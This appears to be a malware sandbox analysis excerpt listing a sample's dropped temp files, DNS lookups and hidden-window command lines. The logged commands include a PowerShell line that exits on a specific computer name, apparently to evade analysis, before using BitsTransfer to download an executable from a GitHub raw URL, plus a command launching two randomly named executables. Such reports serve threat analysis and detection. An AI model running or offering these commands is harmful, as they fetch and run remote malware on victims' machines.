Technical Information
- %TEMP%\7zipsfx.000\gpzaoglz.rt
- %TEMP%\7zipsfx.000\utfstbb.rt
- 'microsoft.com':80
- 'ra#.####ubusercontent.com':443
- 'ra#.####ubusercontent.com':443
- DNS ASK microsoft.com
- DNS ASK ra#.####ubusercontent.com
- '%WINDIR%\syswow64\cmd.exe' /c echo Mow' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c powershell -command If ($env:computername -eq 'DESKTOP-QO5QU33') {exit}; Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/igkiu/p1/main/old.exe,https:...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start hTbbFEaCbequeq.exe & start nnETwMIWYisS.exe' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo Mow
- '%WINDIR%\syswow64\cmd.exe' /c powershell -command If ($env:computername -eq 'DESKTOP-QO5QU33') {exit}; Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/igkiu/p1/main/old.exe,https:...
- '%WINDIR%\syswow64\cmd.exe' /c start hTbbFEaCbequeq.exe & start nnETwMIWYisS.exe